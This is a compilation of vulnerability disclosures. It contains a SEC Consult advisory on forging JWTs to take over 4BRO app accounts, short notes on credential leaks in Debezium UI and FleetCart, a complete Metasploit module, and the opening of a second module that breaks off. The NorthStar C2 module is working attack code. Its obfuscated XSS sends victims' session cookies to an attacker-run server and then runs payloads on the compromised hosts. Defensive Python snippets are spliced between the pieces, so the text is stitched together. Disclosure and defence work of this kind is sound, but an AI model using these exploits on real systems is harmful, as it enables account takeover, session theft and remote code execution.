<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240522-0 ><br />=======================================================================<br /> title: Broken access control & API Information Exposure<br /> product: 4BRO App<br /> vulnerable version: before 2024-04-17<br /> fixed version: 2024-04-17<br /> CVE number: -<br /> impact: Critical<br /> homepage: https://www.4bro.de<br /> found: 2023-05-07<br /> by: Max Rull (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"4BRO is a German company known for producing iced tea beverages. The brand offers<br />a variety of flavors, including unique combinations such as peach, bubblegum,<br />and watermelon mint. 4BRO emphasizes modern and appealing packaging, targeting<br />a younger demographic. The company promotes its products through various platforms<br />and incentivizes customer loyalty with their app, which allows users to collect<br />points for rewards. 
The company's headquarters is located in Germany, and their<br />products are widely available both online and in retail stores."<br /><br />Source: https://www.4bro.de<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor has fixed the security issues in the API server as of 2024-04-17.<br /><br />SEC Consult highly recommends performing a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Broken access control via IDOR in 4BRO app API<br />An IDOR vulnerability (Insecure Direct Object Reference) allows an attacker<br />to change the username in the Bearer token used for authentication in the 4BRO app.<br />This leads to account takeover as a result of broken access control (poor Bearer<br />token verification). Attackers are able to access all data or Bro points ("broins")<br />from other users.<br /><br /><br />2) API Information Exposure<br />When opening the app as an unauthenticated user, the 4BRO app loads JSON data<br />from a publicly available API endpoint containing sensitive data like e-mail<br />addresses of employees, internal invoices, a CV including personal information,<br />a gift card etc.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Broken access control via IDOR in 4BRO app API<br />When logging into the 4BRO app, the server returns a JWT (JSON Web Token).<br />The "login" HTTP request looks like this:<br />--------------------------------------------------------------------------------<br />POST /api/user/signin HTTP/2<br />Host: adminpanel.4bro.de<br />Content-Type: application/json<br />[...]<br /><br />{"email":"<login email>","password":"<login password>"}<br />--------------------------------------------------------------------------------<br /><br />The server responds with a JWT used for
authentication and additional<br />account-related data:<br />--------------------------------------------------------------------------------<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />[...]<br /><br />{<br /> "token": "<JWT here>",<br /> "userData": {<br /> "isBlocked": false,<br /> "_id": "[...]",<br /> "userType": "USER",<br /> "email": "<login email>",<br /> "broins": 0,<br /> "deviceId": null,<br /> "userCreationDate": "2023-XX-XXTXX:XX:XX.XXXZ",<br /> "address": [{<br /> "_id": "[...]",<br /> "streetName": "[...]",<br /> "streetNumber": "[...]",<br /> "postalcode": "[...]",<br /> "city": "[...]",<br /> "firstName": "[...]",<br /> "lastName": "[...]",<br /> "country": "at"<br /> }<br /> ],<br /> "ratings": [],<br /> "__v": 0,<br /> "pushToken": "[...]",<br /> "telekomUUID": "[...]"<br /> }<br />}<br />--------------------------------------------------------------------------------<br /><br />Because the JWT is only base64-encoded, it is easy to decode the JWT's<br />header and payload as clear text using JWT decoders like https://token.dev/:<br />--------------------------------------------------------------------------------<br />Header:<br />{<br /> "kid": "[...]",<br /> "alg": "RS256"<br />}<br />--------------------------------------------------------------------------------<br />Payload:<br />{<br /> "sub": "[...]",<br /> "event_id": "[...]",<br /> "token_use": "access",<br /> "scope": "aws.cognito.signin.user.admin",<br /> "auth_time": 1683565567,<br /> "iss": "https://cognito-idp.eu-central-1.amazonaws.com/[...]",<br /> "exp": 1683569167,<br /> "iat": 1683565567,<br /> "jti": "[...]",<br /> "client_id": "[...]",<br /> "username": "<login email>"<br />}<br />--------------------------------------------------------------------------------<br /><br />The payload of the JWT contains multiple values indicating that AWS Cognito is in use.<br />By changing the "username" value of the JWT payload to a victim email, it is 
possible<br />to use the modified JWT to authenticate as the victim. The victim should already<br />have a normally registered account in the 4BRO app. By trial and error, it turns out<br />that even the following modified JWT payload gets accepted by the server:<br />--------------------------------------------------------------------------------<br />{<br /> "sub": "0",<br /> "event_id": "0",<br /> "token_use": "access",<br /> "scope": "aws.cognito.signin.user.admin",<br /> "auth_time": 0,<br /> "iss": "",<br /> "exp": 0,<br /> "iat": 0,<br /> "jti": "0",<br /> "client_id": "0",<br /> "username": "<login email>"<br />}<br />--------------------------------------------------------------------------------<br /><br />Meanwhile, the "kid" property in the JWT header must be a valid value, but can belong<br />to any other already existing 4BRO app account. The JWT signature can be the same<br />and does not get verified at all.<br /><br />Using the modified JWT, all API methods supported by the 4BRO app can be executed.<br />Because the server only checks the "username" property in the JWT payload and does<br />little to no JWT verification, the server thinks that the request came from the<br />account associated with the login email contained in the "username" property.<br /><br />This way, sensitive data such as the current "broin" balance, full user data as seen<br />in the login response, previous transactions, redeemed vouchers and goodies etc.<br />can be accessed without restrictions, using the 4BRO API.
Also, the "sending broins"<br />action can be performed so that earned "broins" could be transferred to an attacker's<br />account balance.<br /><br /><br />2) API Information Exposure<br />By monitoring the 4BRO app's requests over a proxy, it can be observed that<br />the following HTTP request is made when opening the "Goodies" section of the app:<br />--------------------------------------------------------------------------------<br />GET /api/goodies?pageSize=1000 HTTP/2<br />Host: adminpanel.4bro.de<br />[...]<br />--------------------------------------------------------------------------------<br /><br />The response is a JSON object containing all goodies that are or were at some point<br />available in the 4BRO app:<br />--------------------------------------------------------------------------------<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 327138<br />[...]<br /><br />{<br /> "goodiesList": [{<br /> "_id": "61950603005c650530b63aac",<br /> "name": "1x 4BRO Getränk Imbiss",<br /> "longDescription": "[...]",<br /> "shortDescription": "Auf unseren Nacken!",<br /> "imagePath":<br />"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/goodies/app_kachel_food_256x256.jpg",<br /> "category": "Food",<br /> "quantity": 999999999999808,<br /> "costOfGoodie": 250,<br /> "supplier": "<email removed>",<br /> "totalGoodies": 999999999999861,<br /> "goodieAvailableTime": "Unlimited",<br /> "deliveryMethod": "partnerCoupon",<br /> "isNewGoodie": false,<br /> "inhouseAppVoucherUrl":<br />"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/inhouseAppVouchers/undefined",<br /> "__v": 1,<br /> "rating": {<br /> "value": 3.991869918699184,<br /> "total": 123<br /> },<br /> "forceGoodie": "true",<br /> "goodieAvailableEndTime": null,<br /> "goodieAvailableStartTime": null,<br /> "restriction": [],<br /> "hidden": false,<br /> "slashedCostOfGoodie": null<br /> },{<br /> [...]<br /> },<br /> [...]<br /> }<br /> 
],<br /> "goodieCount": 371<br />}<br />--------------------------------------------------------------------------------<br /><br />This JSON object already contains sensitive data such as the goodie suppliers' email<br />addresses. Out of the 371 goodies, 36 have a URL to a PDF file contained<br />within the "inhouseAppVoucherUrl" property. Because these files are hosted on an<br />AWS S3 bucket, everyone can access these documents without authentication.<br /><br />These documents seem to contain various sensitive company internal and personal<br />information.<br /><br />While discovering vulnerability 1), we found that old gift codes were also stored as<br />PDF files on the AWS S3 bucket. The names of the gift code PDF files indicate that<br />there may be more similarly named documents (IDOR) which could be detected in an<br />automated way. This could be leveraged to find additional gift code PDF files stored<br />on the AWS S3 bucket.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following app version, downloaded from the Google Play store, has been tested;<br />it was the most recent version available at the time of the test:<br />* 3.14.7<br /><br />Because the vulnerability is actually server-side within the API, the iOS app was<br />also affected at the time the vulnerabilities were discovered.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-12: Contacting vendor through broservice@4bro.de (owner) and info@dev5310.com<br /> (developers according to Google Play store)<br />2023-06-15: Vendor asks about the risks of the identified vulnerabilities and which<br /> parts of the application are affected and whether any costs would arise<br /> before they provide us with a security contact.<br />2023-06-16: Detailed answer regarding risk estimation, responsible disclosure and<br /> that no costs are involved.<br />2023-06-19: Vendor requests a phone conference,
scheduled for 21st June.<br />2023-06-21: Clarifying responsible disclosure, explaining vulnerabilities and next<br /> steps in phone call. Providing security advisory to vendor.<br />2023-06-29: Vendor has sent the advisory to the developer team for evaluation<br /> and will notify SEC Consult about the release of the security patch.<br />2023-08-18: Asking for a status update.<br />2023-08-31: It is planned to release an Android/iOS app update end of September<br />2023-09-18: Vendor needs to postpone update, no new date available.<br />2023-11-08: Asking for a status update; no response.<br />2023-11-21: Asking for a status update.<br />2023-12-11: Vendor response, fix is available in test environment, production<br /> will be fixed by end of this year.<br />2024-01-24: Asking for a status update; no response.<br />2024-02-12: Asking for a status update.<br />2024-02-12: Vendor is still waiting for a response from their IT.<br />2024-04-17: Asking for a status update.<br />2024-04-17: Vendor states that the vulnerabilities have been fixed.<br />2024-04-17: Asking for the fix date, whether an app update was needed for applying<br /> the fix, and the fixed app version. No response.<br />2024-05-13: Asking vendor again about fixed version, etc., setting preliminary release<br /> date to 2024-05-21. 
No response.<br />2024-05-22: Release of security advisory<br /><br /><br /><br />Solution:<br />---------<br />The vendor implemented a fix in the affected API server as of 2024-04-17.<br />An app update on Android or iOS is not required to apply the fix.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF M. Rull / @2024<br /></code></pre>
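Server-side validation that rejects the forged tokens the advisory describes, as an added example (not SEC Consult's or 4BRO's code): it checks algorithm, kid, signature, issuer, token_use, client_id and the time window before trusting the username claim, and shows the "decode and trust" pattern beside it. It assumes a constructed HS256 key set and placeholder issuer and client id values; HS256 is used so it runs on the Python standard library alone, whereas Cognito issues RS256 tokens that would be verified with the pool's public key selected by kid.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed HS256 key set standing in for the Cognito pool's JWKS: kid -> secret.
KEYS = {"key-1": b"constructed-secret-1", "key-2": b"constructed-secret-2"}
# Placeholders: the real values are the user pool's issuer URL and the app client id.
EXPECTED_ISS = "https://cognito-idp.eu-central-1.amazonaws.com/POOL_ID_PLACEHOLDER"
EXPECTED_CLIENT_ID = "CLIENT_ID_PLACEHOLDER"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(kid: str, claims: dict) -> str:
    """Issuer side: sign header.payload with the key named by kid."""
    header = {"kid": kid, "alg": "HS256"}
    signing_input = (b64url_encode(json.dumps(header).encode())
                     + "." + b64url_encode(json.dumps(claims).encode()))
    sig = hmac.new(KEYS[kid], signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def username_without_verification(token: str) -> str:
    """The behaviour the advisory describes: decode the payload and trust the
    username claim without checking the signature or any other claim."""
    return json.loads(b64url_decode(token.split(".")[1]))["username"]


def verify_token(token: str, now=None):
    """Return (True, username) only when every check passes, else (False, reason)."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed token"
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        payload = json.loads(b64url_decode(payload_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return False, "undecodable token"
    # Pin the algorithm; never let the token choose it.
    if header.get("alg") != "HS256":
        return False, "unexpected alg"
    key = KEYS.get(header.get("kid"))
    if key is None:
        return False, "unknown kid"
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return False, "bad signature"
    # Claim checks: issuer, token type, app client, and the validity window.
    if payload.get("iss") != EXPECTED_ISS:
        return False, "wrong issuer"
    if payload.get("token_use") != "access":
        return False, "not an access token"
    if payload.get("client_id") != EXPECTED_CLIENT_ID:
        return False, "wrong client_id"
    if not isinstance(payload.get("exp"), int) or payload["exp"] <= now:
        return False, "expired"
    if not isinstance(payload.get("iat"), int) or payload["iat"] > now + 60:
        return False, "issued in the future"
    if not payload.get("username"):
        return False, "missing username"
    return True, payload["username"]


def demo(now: int = 1683565600):
    """Run the validator on a valid token and on the two forgeries from the advisory."""
    claims = {"sub": "u-1", "event_id": "e-1", "token_use": "access",
              "scope": "aws.cognito.signin.user.admin", "auth_time": now - 33,
              "iss": EXPECTED_ISS, "exp": now + 3567, "iat": now - 33, "jti": "j-1",
              "client_id": EXPECTED_CLIENT_ID, "username": "alice@example.com"}
    token = mint_token("key-1", claims)
    head, _, sig = token.split(".")
    # Forgery 1: payload re-encoded with another username, header and signature left as-is.
    swapped = head + "." + b64url_encode(
        json.dumps({**claims, "username": "bob@example.com"}).encode()) + "." + sig
    # Forgery 2: the all-zero payload the advisory reports the server accepted.
    zero = {"sub": "0", "event_id": "0", "token_use": "access",
            "scope": "aws.cognito.signin.user.admin", "auth_time": 0, "iss": "",
            "exp": 0, "iat": 0, "jti": "0", "client_id": "0", "username": "bob@example.com"}
    zeroed = head + "." + b64url_encode(json.dumps(zero).encode()) + "." + sig
    return {
        "valid": verify_token(token, now),
        "swapped_trusted_blindly": username_without_verification(swapped),
        "swapped": verify_token(swapped, now),
        "zeroed": verify_token(zeroed, now),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```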
<pre><code># Exploit Title: Debezium UI - Credential Leakage<br /><br /># Google Dork: N/A<br /><br /># Date: [2024-03-11]<br /><br /># Exploit Author: Ihsan Cetin, Hamza Kaya Toprak<br /><br /># Vendor Homepage: https://debezium.io/<br /><br /># Software Link: N/A<br /><br /># Version: < 2.5 (REQUIRED)<br /><br /># Tested on: [N/A]<br /><br /># CVE : CVE-2024-28736<br /><br />Proof of concept:<br /><br /># Details<br /><br />#Debezium-ui (version 2.5) is vulnerable to a password exposure issue that could allow an attacker to retrieve sensitive credentials in plaintext format.<br /><br /># PoC :<br /><br />#Unmasked Password in Connector Configuration: When navigating to the connectors section within the application's connector screen, the password field, which should ideally be masked for security purposes, is briefly displayed in plaintext format during the initial seconds.<br /><br /># Plaintext Password Retrieval via API Endpoint: By accessing the URL<br /><br />http://10.0.15.51:8080//api/connectors/1/account-activity/config<br /><br />#and searching for the database.password parameter, an attacker can retrieve the database password in plaintext format without any authentication.<br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: FleetCart 4.1.1 - WebPage Content Information Disclosure<br /># Exploit Author: CraCkEr<br /># Date: 13/05/2024<br /># Vendor: EnvaySoft<br /># Vendor Homepage: https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826<br /># Software Demo Link: https://demo.fleetcart.envaysoft.com/en<br /># Tested on: Windows 11 Pro 22H2<br /># Impact: Sensitive Information Leakage<br /># CWE: CWE-200 - CWE-284 - CWE-266<br /># CVE: CVE-2024-5230<br /># CAPEC: CAPEC-19 / CAPEC-116<br /># ATT&CK: T1592<br /><br /><br />## Description<br /><br />Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the "Razorpay" "razorpayKeyId".<br /><br /><br />## Steps to Reproduce:<br /><br />When you view the majority of the pages on the website, such as<br /><br />https://demo.fleetcart.envaysoft.com/en/login<br />https://demo.fleetcart.envaysoft.com/en/categories/smartphones/products<br />https://demo.fleetcart.envaysoft.com/en/products?query=123<br /><br /><br />There is information leaking in the body page response.<br /><br />+---------------------+<br />razorpayKeyId: 'rzp_test_oACp03vDsqdixc',<br />+---------------------+<br /><br /><br />Note: the same leaked "razorpayKeyId" is added to "Razorpay" in the Administration Panel.<br /><br />on this Path:<br /><br />https://demo.fleetcart.envaysoft.com/en/admin/settings?tab=razorpay (Login as Administrator)<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'NorthStar C2 XSS to Agent RCE',<br /> 'Description' => %q{<br /> NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is<br /> vulnerable to a stored xss.<br /> An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.<br /> With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts<br /> (agents), and kill the original agent.<br /><br /> Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on<br /> Ubuntu 22.04. 
The agent was running on Windows 10 19045.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'chebuya' # original PoC, analysis<br /> ],<br /> 'DefaultOptions' => {<br /> 'URIPATH' => '/' # avoid long URLs due to 20char limit in xss payloads<br /> },<br /> 'References' => [<br /> [ 'URL', 'https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/' ],<br /> [ 'URL', 'https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc' ],<br /> [ 'URL', 'https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c'],<br /> [ 'CVE', '2024-28741']<br /> ],<br /> 'Platform' => ['win'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2024-03-12',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [EVENT_DEPENDENT],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('TARGETURI', [ true, 'The URI of the NorthStar C2 Application', '/']),<br /> OptBool.new('KILL', [ false, 'Kill the NorthStar C2 agent', false])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'getin.php'),<br /> 'method' => 'GET'<br /> )<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> return CheckCode::Detected('NorthStar Login page detected') if res.body.include? 
'<title>The NorthStar Login</title>'<br /><br /> CheckCode::Safe('NorthStar C2 Login page not detected')<br /> end<br /><br /> def steal_agents(cookie)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'clients.php'),<br /> 'headers' => {<br /> 'cookie' => "PHPSESSID=#{cookie}"<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> soup = Nokogiri::HTML(res.body)<br /> rows = soup.css('tr')<br /><br /> agent_table = Rex::Text::Table.new(<br /> 'Header' => 'Live Agents',<br /> 'Indent' => 1,<br /> 'Columns' =><br /> [<br /> 'ID',<br /> 'IP',<br /> 'OS',<br /> 'Username',<br /> 'Hostname',<br /> 'Status'<br /> ]<br /> )<br /><br /> rows.each do |row|<br /> cells = row.css('td')<br /> next if cells.length != 9<br /><br /> status = cells[7].text.strip<br /> next if status != 'Online'<br /><br /> agent_id = cells[1].text.strip<br /> agent_ip = cells[2].text.strip<br /> hostname = cells[5].text.strip<br /><br /> agent_table << [agent_id, agent_ip, cells[3].text.strip, cells[4].text.strip, hostname, cells[7].text.strip]<br /> report_host(host: agent_ip, name: hostname, os_name: cells[3].text.strip, info: "Northstar C2 Agent Deployed, callback: #{datastore['RHOST']}")<br /> end<br /><br /> fail_with(Failure::NotFound, 'No live agents to exploit') if agent_table.rows.empty?<br /><br /> print_good(agent_table.to_s)<br /><br /> script_tags = soup.css('script')<br /><br /> csrf_token = nil<br /> script_tags.each do |script_tag|<br /> if script_tag.text.include?('csrfToken')<br /> csrf_token = script_tag.text.split('"')[1]<br /> break<br /> end<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find CSRF token") unless csrf_token<br /><br /> vprint_good("CSRF Token: #{csrf_token}")<br /><br /> agent_table.rows.each do |agent|<br /> agent_id = agent[0]<br /> hostname = agent[4]<br /> print_status("(#{agent_id}) Stealing #{hostname}")<br /><br /> 
vprint_status(" (#{agent_id}) Enabling shell mode")<br /> agent_exec(agent_id, csrf_token, cookie, 'enablecmd')<br /> vprint_status(" (#{agent_id}) Running payload")<br /> agent_exec(agent_id, csrf_token, cookie, payload.encoded)<br /> vprint_status(" (#{agent_id}) Disabling shell mode")<br /> agent_exec(agent_id, csrf_token, cookie, 'disablecmd')<br /> next unless datastore['KILL']<br /><br /> vprint_status(" (#{agent_id}) Killing NorthStar payload")<br /> agent_exec(agent_id, csrf_token, cookie, 'die')<br /> end<br /> end<br /><br /> def agent_exec(agent_id, csrf_token, cookie, command)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'functions', 'setCommand.nonfunction.php'),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'cookie' => "PHPSESSID=#{cookie}"<br /> },<br /> 'vars_post' => {<br /> 'slave' => agent_id,<br /> 'command' => command,<br /> 'sid' => agent_id,<br /> 'token' => csrf_token<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /><br /> # 1min seems enough, NorthStar mentions 4_000ms response times...<br /> (2 * 60).times do<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'getresponse.php'),<br /> 'headers' => {<br /> 'cookie' => "PHPSESSID=#{cookie}"<br /> },<br /> 'vars_get' => {<br /> 'slave' => agent_id<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> if !res.body.empty? || command == 'die'<br /> vprint_good(" Command sent successfully to agent #{agent_id}, response: #{res.body}")<br /> return<br /> end<br /> Rex.sleep(0.5)<br /> end<br /> end<br /><br /> def on_request_uri(cli, request)<br /> if request.method == 'GET' && @xss_response_received == false<br /> vprint_status('Received GET request.')<br /> return unless request.uri.include? 
'='<br /><br /> cookie = request.uri.split('PHPSESSID=')[1]<br /> print_good("Received cookie: #{cookie}")<br /> send_response_html(cli, '')<br /> @xss_response_received = true<br /> steal_agents(cookie)<br /> end<br /> send_response_html(cli, '')<br /> end<br /><br /> def xor_strings(text, key)<br /> text.chars.map.with_index { |char, i| (char.ord ^ key[i % key.length].ord).chr }.join<br /> end<br /><br /> def srvhost<br /> datastore['SRVHOST']<br /> end<br /><br /> def primer<br /> @xss_response_received = false<br /> vprint_status('Sending XSS')<br /> # divide up the host length so that it fits in our payload<br /> h1 = srvhost[0...srvhost.length / 2]<br /> h2 = srvhost[srvhost.length / 2..]<br /> sid_payloads = ['*/</script><', '*/i.src=u/*', '*/new Image;/*', '*/var i=/*', "*/s+h+p+'/'+c;/*", '*/var u=/*', "*/'http://';/*", '*/var s=/*', "*/':#{datastore['SRVPORT']}';/*", '*/var p=/*', '*/a+b;/*', '*/var h=/*', "*/'#{h2}';/*", '*/var b=/*', "*/'#{h1}';/*", '*/var a=/*', '*/d.cookie;/*', '*/var c=/*', '*/document;/*', '*/var d=/*', '</td><script>/*']<br /> sid_payloads.each do |pload|<br /> pload = "N#{pload}q"<br /> vprint_status("Sending: #{pload}")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.php'),<br /> 'method' => 'POST',<br /> 'vars_get' => {<br /> 'sid' => Rex::Text.encode_base64(xor_strings(pload, 'northstar'))<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code received: #{res.code}") unless res.code == 200<br /> end<br /> print_status('Waiting on XSS execution')<br /> end<br /><br /> def exploit<br /> fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0<br /> fail_with(Failure::BadConfig, 
'SRVPORT and FETCH_SRVPORT must be different') if datastore['SRVPORT'] == datastore['FETCH_SRVPORT']<br /> super<br /> end<br />end<br /></code></pre>
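A log check for the sid encoding the module above relies on, added here as an example that is not part of the Metasploit module or of NorthStar: it decodes the parameter the way the server does (base64, then XOR with the key 'northstar' the module uses) and flags values that carry HTML or script fragments, which an agent id never contains. The access-log lines it runs over are constructed.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote, urlsplit

XOR_KEY = b"northstar"  # the key the module XORs the sid with before base64-encoding it
# Fragments a real agent id never contains; the module's payload chunks are built from them.
SUSPICIOUS = ("<script", "</script", "</td>", "document", "cookie", "src=", "/*", "*/")
# Combined access-log format; the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SID_RE = re.compile(r'(?:^|&)sid=([^&]*)')


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_sid(value: str):
    """Undo the server-side encoding; None when the value is not valid base64."""
    try:
        raw = base64.b64decode(unquote(value), validate=True)
    except (binascii.Error, ValueError):
        return None
    return xor_bytes(raw, XOR_KEY).decode("latin-1")


def inspect_line(line: str):
    """For a login.php request carrying sid, return (decoded_sid, reasons);
    reasons is empty for a clean value. Any other line returns None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/login.php"):
        return None
    sid = SID_RE.search(url.query)
    if not sid:
        return None
    decoded = decode_sid(sid.group(1))
    if decoded is None:
        return None, ["sid is not valid base64"]
    reasons = [frag for frag in SUSPICIOUS if frag in decoded]
    if not decoded.isprintable():
        reasons.append("non-printable bytes after decoding")
    return decoded, reasons


def encode_sid(text: str) -> str:
    """Inverse of decode_sid, used only to build the constructed sample lines."""
    return quote(base64.b64encode(xor_bytes(text.encode("latin-1"), XOR_KEY)).decode(), safe="")


# Constructed sample: a normal check-in, a value shaped like one of the module's chunks,
# an unrelated request, and a malformed sid.
SAMPLE_LOG = [
    f'10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "POST /login.php?sid={encode_sid("WIN-7F3A2B-1a2b")} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "POST /login.php?sid={encode_sid("N</td><script>/*q")} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:06 +0000] "GET /clients.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "POST /login.php?sid=not_base64! HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (line_number, decoded_sid, reasons) for every line that deserves a look."""
    findings = []
    for n, line in enumerate(lines, 1):
        result = inspect_line(line)
        if result and result[1]:
            findings.append((n, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for n, decoded, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: sid={decoded!r} -> {', '.join(reasons)}")
```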
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::PhpFilterChain<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated remote code execution (RCE) vulnerability<br /> in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the<br /> `submitIndex.php` file, where user-supplied input is passed directly to the `require()`<br /> function without proper sanitization. By exploiting this, an attacker can leverage the<br /> PHP filter chaining technique to execute arbitrary PHP code on the server. This allows<br /> for the execution of commands and control over the affected system. 
